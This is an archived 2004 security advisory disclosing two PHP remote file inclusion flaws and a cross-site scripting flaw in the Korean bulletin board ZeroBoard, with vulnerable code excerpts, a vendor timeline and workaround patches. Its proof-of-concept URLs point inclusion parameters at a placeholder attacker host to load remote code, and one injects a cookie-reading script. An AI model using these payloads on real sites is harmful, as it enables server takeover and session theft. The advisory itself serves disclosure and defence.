TUCoPS :: Web BBS :: etc :: hack7198.htm

ZeroBoard PHP source injection and cross-site scripting vulns
STG Security Advisory: [SSA-20041220-16] PHP source injection and cross-site scripting vulnerabilities in ZeroBoard 



STG Security Advisory: [SSA-20041220-16] PHP source injection and cross-site

scripting vulnerabilities in ZeroBoard



Revision 1.2

Date Published: 2004-12-20 (KST)

Last Update: 2004-12-24

Disclosed by SSR Team (advisory@stgsecurity.com) 



Summary

=======

ZeroBoard is one of widely used web BBS applications in Korea. . However, an

input validation flaw can cause malicious attackers to run arbitrary

commands with the privilege of the HTTPD process, which is typically run as

the nobody user.





Vulnerability Class

===================

Implementation Error: Input validation flaw



Impact

======

High : arbitrary commands execution.



Affected Products

================

ZeroBoard 4.1pl4 and prior



Vendor Status: NOT FIXED

========================

2004-11-20 Vulnerabilities found.

2004-11-20 1st vendor contact, but they didn't replied.

2004-11-22 2nd vendor contact, but they didn't replied.

2004-12-13 STG Security, Inc. customer notified.

2004-12-24 Official release.



Details

=======

Vulnerability 1 : PHP source injection vulnerability

- - ------------------------------------

- - - Proof of concept

http://[victim]/outlogin.php?_zb_path=ftp://[attacker]/pub/ 



- - - Environment

PHP 5.0.x

php.ini : register_globals = On



- - - Description

As of PHP 5.0.0, file_exists() can be used with URL wrappers explained at

http://www.php.net/manual/en/function.file-exists.php. Thus _zb_path 

parameter in outlogin.php can be easily exploited.



- - - Part of vulnerable source, outlogin.php.

- - ----

// 제로보드 디렉토리 인지 체크

if(!file_exists($_zb_path."lib.php")) {

  echo "제로보드 디렉토리가 아닙니다";

  return;

}



// _head.php 읽음

@include $_zb_path."_head.php";



}

- - ----



Vulnerability 2 : PHP source injection vulnerability

- - ------------------------------------

- - - Proof of concept

http://[victim]/include/write.php?dir=http://[attacker]/ 





- - - Environment

php.ini: register_globals = On



- - - Reason

Uninitialized $dir variable in write.php





- - - Part of vulnerable source, include/write.php

- - ----

include $dir."/write.php";

- - ----



Vulnerability 3 : Cross-site scripting vulnerability

- - --------------------------------------

- - - Proof of concept

http://[victim]/check_user_id.php?user_id=<script>alert(document.c ookie)





- - - Reason

check_user_id.php doesn't validate the input value of user_id.



- - - Part of vulnerable source, check_user_id.php

- - ----

$user_id = trim($user_id);

... 생략 ...

if($check[0]) echo "$user_id 는 이미 등록된
 아이디입니다";

else echo"$user_id 는 사용하실수 있습니다";

... 생략 ...

- - ----





Workaround

==========

Without official patches of theses vulnerability, modify the vulnerable

sources as following recommendations.



Vulnerability 1: As of zboard 4.1pl4

- - ----------------------------

Insert the following code at 59th line of outlogin.php,



if(eregi(":\/\/",$_zb_path)) $_zb_path="";





Vulnerability 2: As of zboard 4.1pl4

- - ----------------------------

Insert the following code at 15th line of include/write.php,



if(eregi(":\/\/",$dir)) $dir="";





Vulnerability 3: As of zboard 4.1pl4

- - ----------------------------

Insert the following code at 3rd line of check_user_id.php,



$user_id = htmlspecialchars(trim($user_id));





Credits

======

Jeremy Bae at STG Security

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH